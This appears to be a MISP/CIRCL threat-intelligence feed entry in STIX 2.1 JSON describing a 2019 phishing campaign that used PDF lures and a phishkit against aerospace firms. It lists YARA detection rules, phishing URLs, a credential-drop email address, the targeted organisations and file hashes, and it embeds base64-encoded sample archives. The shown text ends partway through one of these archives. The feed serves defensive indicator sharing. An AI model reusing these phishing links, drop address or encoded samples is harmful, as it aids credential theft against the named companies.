misp-circl-feed/feeds/circl/stix-2.1/5cdd3938-7134-4908-9552-173cc0a8016e.json

1327 lines
6.8 MiB
JSON
Raw Normal View History

2023-04-21 14:44:17 +00:00
{
"type": "bundle",
"id": "bundle--5cdd3938-7134-4908-9552-173cc0a8016e",
"objects": [
{
"type": "identity",
"spec_version": "2.1",
"id": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2021-05-24T09:55:22.000Z",
"modified": "2021-05-24T09:55:22.000Z",
"name": "EUROLEA",
"identity_class": "organization"
},
{
"type": "report",
"spec_version": "2.1",
"id": "report--5cdd3938-7134-4908-9552-173cc0a8016e",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2021-05-24T09:55:22.000Z",
"modified": "2021-05-24T09:55:22.000Z",
"name": "Targeted phishing - PDF documents / phishkit",
"published": "2021-05-26T10:17:36Z",
"object_refs": [
"indicator--5cdd3a39-84f0-4179-b3ea-173cc0a8016e",
"indicator--5cdd3a5b-3448-49d1-b35e-12a4c0a8016e",
"indicator--5cdd5b25-5624-4404-b507-c170950d210f",
"indicator--5cdd5b65-9f28-4c2f-944e-444b950d210f",
"indicator--5cdd5b65-dcb0-49b0-bf70-4129950d210f",
"indicator--5cdd5b65-5d90-4cdf-ab91-4355950d210f",
"indicator--5cdd5b65-0804-4636-bffe-491e950d210f",
"indicator--5cdd5b65-b1f0-4e0f-bf15-4c53950d210f",
"indicator--5cdd5dcf-4a6c-4843-94b3-4d49950d210f",
"x-misp-attribute--5cdd63dc-0e48-4b97-bb9e-43ff950d210f",
"x-misp-attribute--5cdd63dc-b678-4fae-bd00-4390950d210f",
"x-misp-attribute--5cdd63dc-29ec-42c0-936b-4d9d950d210f",
"x-misp-attribute--5cdd63dc-713c-4eb6-adf5-4f3e950d210f",
"x-misp-attribute--5cdd63dc-ab44-4ab7-be4b-4aa1950d210f",
"x-misp-attribute--5cdd63dc-0b30-404e-a1c4-4479950d210f",
"observed-data--5cdd6540-3188-4be6-8664-4555950d210f",
"url--5cdd6540-3188-4be6-8664-4555950d210f",
"indicator--5cdd66da-91e4-49bb-a834-409b950d210f",
"observed-data--5cdd6827-982c-43af-9aa9-4212950d210f",
"url--5cdd6827-982c-43af-9aa9-4212950d210f",
"x-misp-attribute--5cdd683b-6530-4b0d-a8de-40c1950d210f",
"indicator--97bd5034-12a0-4c06-a779-de38deac6059",
"indicator--3a4f2299-8136-45ec-8927-223b672e4b88",
"indicator--9608228e-4373-44ac-9fdd-bd37d5b02275",
"indicator--9b01cb2b-b6f7-433f-a91d-7b572e8324bd",
"indicator--06a84b03-0560-46ae-8570-1e7072a0b400",
"indicator--453258ef-0925-4471-9dcc-a06ab8038664",
"indicator--5cdd5ff1-ed58-46d3-bed7-4bae950d210f",
"x-misp-object--5cdd6190-8c08-46ef-b523-4da2950d210f",
"malware--5cdd62fc-c898-42fb-ad4d-4aac950d210f",
"x-misp-object--d9bdc42c-191f-49a2-8cbe-2604f5462df6",
"x-misp-object--dcd9ca51-3194-44ee-86a2-5f0cf9b923f8",
"x-misp-object--76f9b382-c58e-46f8-b174-42275f764d3e",
"x-misp-object--c22ccebe-e72f-4b92-9c63-a196b4959c43",
"x-misp-object--c3b36005-d35f-4540-bf78-cd09e2ac5e3d",
"x-misp-object--f5647ba0-86e7-40fa-92a2-7d0fe024a7c2",
"x-misp-object--9156df9c-4067-422e-bd38-8c3908e8ea5f",
2023-12-14 14:30:15 +00:00
"relationship--a1cc288d-984d-454c-bb8a-4f39eaabc9d9",
"relationship--9e24ff82-461d-47c8-9a8d-632538aa9dc7",
"relationship--75543602-135e-47b5-adeb-33617b83b44e",
"relationship--961af626-d91c-4abf-a0b5-96a19a591dc6",
"relationship--93a1b5cb-b3c4-41fe-872b-4baa08510b8f",
"relationship--456cb2c1-ca0b-4af8-bfd3-930e0613f289",
"relationship--1a96e906-2823-4077-9c49-0f488ce57dc7",
"relationship--6310681b-0514-46b0-b9c0-60b29c6d28e2",
"relationship--fb869c02-938e-4078-993e-6950c0959253",
"relationship--9a086825-5904-414d-b479-8205d53b8500",
"relationship--1133d1e2-9a31-40e6-a67e-73d1afa18ba1",
"relationship--278afdc4-b54f-4032-ad42-ae6ec3def777",
"relationship--f02bb64f-98de-49b8-80d6-8cb8adece1b7",
"relationship--aacf8252-c017-41e9-b04d-401371530759",
"relationship--54329dd6-b4f0-4a5b-aba2-487d71030419",
"relationship--0b158655-ad51-41fc-97c9-a4f4ed93aa85",
"relationship--1c74b5bd-88d2-46cc-83b5-30a6496e8870",
"relationship--80ff2b4f-c28a-46e2-b2f8-5bda12b221ff",
"relationship--417112bc-55f4-48fd-b513-8eb02da31fbc",
"relationship--f8b93184-313e-4a81-95fa-bdd35ca3a44a",
"relationship--458035d0-ef31-4f17-9344-6bd8c7f28b58",
"relationship--3e2416c6-eacd-49aa-85ca-7e1536e9ab30",
"relationship--df38c18d-288b-4f38-a75a-41cd5b6dafc4",
"relationship--47244ea9-e1a1-4818-b73a-92839d4eff22",
"relationship--d175e336-6135-4647-b29b-f801281360b4",
"relationship--d355ad79-2ac5-469e-99e1-948556d77f57",
"relationship--3258f81a-c783-4949-9818-8d2420910f0b",
"relationship--541a93ee-4485-4c63-b5a9-506dec849942",
"relationship--ebb79458-35d6-4ba4-8c6f-abf797e8d83a",
"relationship--8f1006c9-baa3-4c34-8910-f15fd53a3d36",
"relationship--35422291-d92b-4209-b8ae-9f15fc0d970f",
"relationship--632e5af4-77bc-4f2d-929c-11fd92709d47"
2023-04-21 14:44:17 +00:00
],
"labels": [
"Threat-Report",
"misp:tool=\"MISP-STIX-Converter\"",
"misp-galaxy:mitre-attack-pattern=\"Spearphishing Attachment - T1193\"",
"misp-galaxy:mitre-attack-pattern=\"Spearphishing Link - T1192\"",
"enisa:nefarious-activity-abuse=\"spear-phishing-attacks\"",
"type:OSINT",
"osint:lifetime=\"perpetual\"",
"osint:certainty=\"50\""
],
"object_marking_refs": [
"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da",
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cdd3a39-84f0-4179-b3ea-173cc0a8016e",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T10:23:53.000Z",
"modified": "2019-05-16T10:23:53.000Z",
"pattern": "[rule PDF_LIFT {\r\nstrings:\r\n\t$a = \"Rect[ 195.05 428.59 411.79 489.67]\"\r\ncondition:\r\n\tall of them\r\n}]",
"pattern_type": "yara",
2023-12-14 14:30:15 +00:00
"pattern_version": "2.1",
2023-04-21 14:44:17 +00:00
"valid_from": "2019-05-16T10:23:53Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Artifacts dropped"
}
],
"labels": [
"misp:type=\"yara\"",
"misp:category=\"Artifacts dropped\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cdd3a5b-3448-49d1-b35e-12a4c0a8016e",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T13:13:24.000Z",
"modified": "2019-05-16T13:13:24.000Z",
"description": "Generic yara rule to find the common JAT author.",
"pattern": "[rule PDF_JAT_AUTHOR {\r\nstrings:\r\n$a = \"<</Author(JAT)\"\r\ncondition:\r\nall of them\r\n}]",
"pattern_type": "yara",
2023-12-14 14:30:15 +00:00
"pattern_version": "2.1",
2023-04-21 14:44:17 +00:00
"valid_from": "2019-05-16T13:13:24Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Artifacts dropped"
}
],
"labels": [
"misp:type=\"yara\"",
"misp:category=\"Artifacts dropped\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cdd5b25-5624-4404-b507-c170950d210f",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T12:44:21.000Z",
"modified": "2019-05-16T12:44:21.000Z",
"description": "Email used to send credentials (found in the sendmail.php file)",
"pattern": "[email-message:to_refs[*].value = 'jatboss6@gmail.com']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-16T12:44:21Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"email-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cdd5b65-9f28-4c2f-944e-444b950d210f",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T12:45:25.000Z",
"modified": "2019-05-16T12:45:25.000Z",
"description": "Phishing links",
"pattern": "[url:value = 'https://lulufabllc.com/doc/cdnrg.com/index.php']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-16T12:45:25Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cdd5b65-dcb0-49b0-bf70-4129950d210f",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T12:45:25.000Z",
"modified": "2019-05-16T12:45:25.000Z",
"description": "Phishing links",
"pattern": "[url:value = 'https://helpersserer.com/wp-inc/Response/www.tenova.com/index.php']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-16T12:45:25Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cdd5b65-5d90-4cdf-ab91-4355950d210f",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T12:45:25.000Z",
"modified": "2019-05-16T12:45:25.000Z",
"description": "Phishing links",
"pattern": "[url:value = 'https://www.arbutusroutes.com/document/standardaero.com/']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-16T12:45:25Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cdd5b65-0804-4636-bffe-491e950d210f",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T12:45:25.000Z",
"modified": "2019-05-16T12:45:25.000Z",
"description": "Phishing links",
"pattern": "[url:value = 'https://www.arbutusroutes.com/document/utc.com/']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-16T12:45:25Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cdd5b65-b1f0-4e0f-bf15-4c53950d210f",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T12:45:25.000Z",
"modified": "2019-05-16T12:45:25.000Z",
"description": "Phishing links",
"pattern": "[url:value = 'https://www.arbutusroutes.com/document/gd.com/']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-16T12:45:25Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cdd5dcf-4a6c-4843-94b3-4d49950d210f",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T12:56:19.000Z",
"modified": "2019-05-16T12:56:19.000Z",
"description": "Phishing links",
"pattern": "[url:value = 'https://www.arbutusroutes.com/document/airbus.com/']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-16T12:56:19Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5cdd63dc-0e48-4b97-bb9e-43ff950d210f",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T13:21:32.000Z",
"modified": "2019-05-16T13:21:32.000Z",
"labels": [
"misp:type=\"target-org\"",
"misp:category=\"Targeting data\""
],
"x_misp_category": "Targeting data",
"x_misp_type": "target-org",
"x_misp_value": "airbus.com"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5cdd63dc-b678-4fae-bd00-4390950d210f",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T13:21:32.000Z",
"modified": "2019-05-16T13:21:32.000Z",
"labels": [
"misp:type=\"target-org\"",
"misp:category=\"Targeting data\""
],
"x_misp_category": "Targeting data",
"x_misp_type": "target-org",
"x_misp_value": "tenova.com"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5cdd63dc-29ec-42c0-936b-4d9d950d210f",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T13:21:32.000Z",
"modified": "2019-05-16T13:21:32.000Z",
"labels": [
"misp:type=\"target-org\"",
"misp:category=\"Targeting data\""
],
"x_misp_category": "Targeting data",
"x_misp_type": "target-org",
"x_misp_value": "standardaero.com"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5cdd63dc-713c-4eb6-adf5-4f3e950d210f",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T13:21:32.000Z",
"modified": "2019-05-16T13:21:32.000Z",
"labels": [
"misp:type=\"target-org\"",
"misp:category=\"Targeting data\""
],
"x_misp_category": "Targeting data",
"x_misp_type": "target-org",
"x_misp_value": "gd.com"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5cdd63dc-ab44-4ab7-be4b-4aa1950d210f",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T13:21:32.000Z",
"modified": "2019-05-16T13:21:32.000Z",
"labels": [
"misp:type=\"target-org\"",
"misp:category=\"Targeting data\""
],
"x_misp_category": "Targeting data",
"x_misp_type": "target-org",
"x_misp_value": "utc.com"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5cdd63dc-0b30-404e-a1c4-4479950d210f",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T13:21:32.000Z",
"modified": "2019-05-16T13:21:32.000Z",
"labels": [
"misp:type=\"target-org\"",
"misp:category=\"Targeting data\""
],
"x_misp_category": "Targeting data",
"x_misp_type": "target-org",
"x_misp_value": "cdnrg.com"
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5cdd6540-3188-4be6-8664-4555950d210f",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T13:27:28.000Z",
"modified": "2019-05-16T13:27:28.000Z",
"first_observed": "2019-05-16T13:27:28Z",
"last_observed": "2019-05-16T13:27:28Z",
"number_observed": 1,
"object_refs": [
"url--5cdd6540-3188-4be6-8664-4555950d210f"
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--5cdd6540-3188-4be6-8664-4555950d210f",
"value": "http://office.online-drive.ml/push-doc/cproduct_brochure_fg.php"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5cdd66da-91e4-49bb-a834-409b950d210f",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T13:34:18.000Z",
"modified": "2019-05-16T13:34:18.000Z",
"description": "Phishing links",
"pattern": "[url:value = 'https://drpianotellsall.com/atkinspiano.com/wwwwww/sma/index.php']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-16T13:34:18Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\""
]
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5cdd6827-982c-43af-9aa9-4212950d210f",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T13:39:51.000Z",
"modified": "2019-05-16T13:39:51.000Z",
"first_observed": "2019-05-16T13:39:51Z",
"last_observed": "2019-05-16T13:39:51Z",
"number_observed": 1,
"object_refs": [
"url--5cdd6827-982c-43af-9aa9-4212950d210f"
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Network activity\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--5cdd6827-982c-43af-9aa9-4212950d210f",
"value": "https://arbutusroutes.com/ssl/akhurst.com/index.php"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5cdd683b-6530-4b0d-a8de-40c1950d210f",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T13:40:11.000Z",
"modified": "2019-05-16T13:40:11.000Z",
"labels": [
"misp:type=\"target-org\"",
"misp:category=\"Targeting data\""
],
"x_misp_category": "Targeting data",
"x_misp_type": "target-org",
"x_misp_value": "akhurst.com"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--97bd5034-12a0-4c06-a779-de38deac6059",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T13:29:10.000Z",
"modified": "2019-05-16T13:29:10.000Z",
"pattern": "[file:hashes.MD5 = '9a58b7f8ba04c32c027126379456e444' AND file:hashes.SHA1 = 'b49d7b503f9e1cd1a22a4933fb1f1a1e0b56f214' AND file:hashes.SHA256 = '28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02' AND file:hashes.SHA512 = '1717448f733024fcb9ea6d591115fb852fd59179c071939a3b1fe8ffb93985925646fb813a2d5828613d0c4494f1ffa3a04182569154fe42fbea1d9e9f5fd27f' AND file:hashes.SSDEEP = '6144:NsxJx6kEIUqWBT/jUcoXxC24MgppaAa2XFVzCCr1OHNw+4je6iMllP:Nsx/M3TLxer4M2sAa2VVpr1OH9Oe6HlJ' AND file:name = '28f73ae365bde8c03d0f93ef73f71c086a026ac58f72b82bb2384c3a5ab42d02' AND file:size = '293456' AND (file:content_ref.payload_bin = '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
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2019-05-16T13:29:10Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--3a4f2299-8136-45ec-8927-223b672e4b88",
"created_by_ref": "identity--5cdc2cdd-bca4-4a76-8955-03cdc0a8016e",
"created": "2019-05-16T13:29:10.000Z",
"modified": "2019-05-16T13:29:10.000Z",
"pattern": "[file:hashes.MD5 = '164db8d1fe5f2ea9dd3ea826b2f0b808' AND file:hashes.SHA1 = '890efaa698f4d43aad15c3dbacb6c01544fd3e27' AND file:hashes.SHA256 = '56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936' AND file:hashes.SHA512 = '27c965d92b452d564917e5101cdd3c254347bf919c84be76b666335425e6673cb4a2553421b13841aaeafbf9a9e25ef37369b3d2a5bee208b4259da9053c1bb3' AND file:hashes.SSDEEP = '6144:xaYsXXzUbbQ+6K4R44u+aUg031qLD0AjJ1sGBIK/:xaTXX+iKO1u5uzK/' AND file:name = '56a73192c75130550294b327b36c051841d3780bd3732b410e0c190db6f9d936' AND file:size = '283714' AND (file:content_ref.payload_bin = 'UEsDBBQACQAIAJhisE6i+JEACSIEAEJUBAAgABwAMTY0ZGI4ZDFmZTVmMmVhOWRkM2VhODI2YjJmMGI4MDhVVAkAA3853Vx/Od1cdXgLAAEEIQAAAAQhAAAAxe9FePXH5boas9owQ9obCHhQk2MO28rWMp+XpuePF9Mn5sToY3/Db3/nXOuJUc0FaixGkllCWqkDie22QBPMnYu4vHiEfbl+HrNoVYbCr/qCN8PTTaM5s5oTnxHLiIpKuaxXe+FaMZhlGCreG4P+SNmBac86g27VXIFADJOSfE0WxdRlW1vB3ypx6lrbAHPg9KXVxGBavW3UeNrrHUx1aCTV0vQjqb/Dj6Jzc6BiRIzSTEd0Jt1nCRlPRXMG2pZdQuJGXGLCTulwuBFUXEeFPARlXDNbRRKlsMEdbi08Xv++u6lHN9vltf2z9qId/mZxbHi6gNJV4T0eEbfZw6CAyIzIayg3DPYMgg8Z1VuKJHtVe0VBZYTLtBta2bprx7r24yyUZCpDWNFjOsMxd8AH7OeY5Rv48skNuZbPKkyeWP/p2Ud8v93N4HqNc7cdKVWtGPPPOtWlStPHU93xzyd9uJgFxVCWc/4YS5qfpstvmgDtgtIoJ8c0DXt+RXow3ac6x5m4OB40ln9t2fNwk2FbLti5JhzVP+TX7rygyDffgcKidk4Bu5cN1l4+nQlXDpWKoBC/L1Xy0AFCgR6e5KVcRlnaaJtfJH7y+68Yeb9c4SuU2pZYDmlC3LFaXGGs8WnhujrPhTe5a7Ej/BZeQdIdudF4kz403rP/+TiuziFSGONcZqaOqqeMbb5UuFPikShzv3GcMmIgF9/m1h9QBpKW9JY+W6aDkPJU1MyUvVyh5W9L1I7QVzjW1VR6ymGKkfgT0lvMTWof82ziU6yAVzF5sgeBUCqs43zUQuWAz/oE9N84sr+bSts1rC2Rr+5ytjw97lC3ggg6hddPG3LMDxLoUs7OIJwb2RtXeZWKU+XEV7lHHNSOfBBy7i/ZB15QIMlltHusOFTH9kgogGuxPAkB2hrxYflfzTK+kiO0APj7GHCWX0peypx1J/12Ntuzo1r69ZTKUYy73saWFY/iQJEhA6Ojo55+OYazkJXOmcvrEwNWM5rRIu3UCP09gyXNI6j2Ih5j+/j2RDm8kh2huUmI8cI9G4n86nxUWRSotbd/nBDhV5AFkyqZFgo8vW+8Z1PjZCiIOELKJDlcw8u6i8KDZz1ZMkGbgZ/QAQ7NTq7TdqMTprVTy78X0vtzPtxcJ01nwbKizqQBmpAPqFyOkaVV4ZsZDs0zQNtdON1V60KLtGBgsCZ+j5O6N7OQzubhsJNXm3CggoEyHYAfumIfP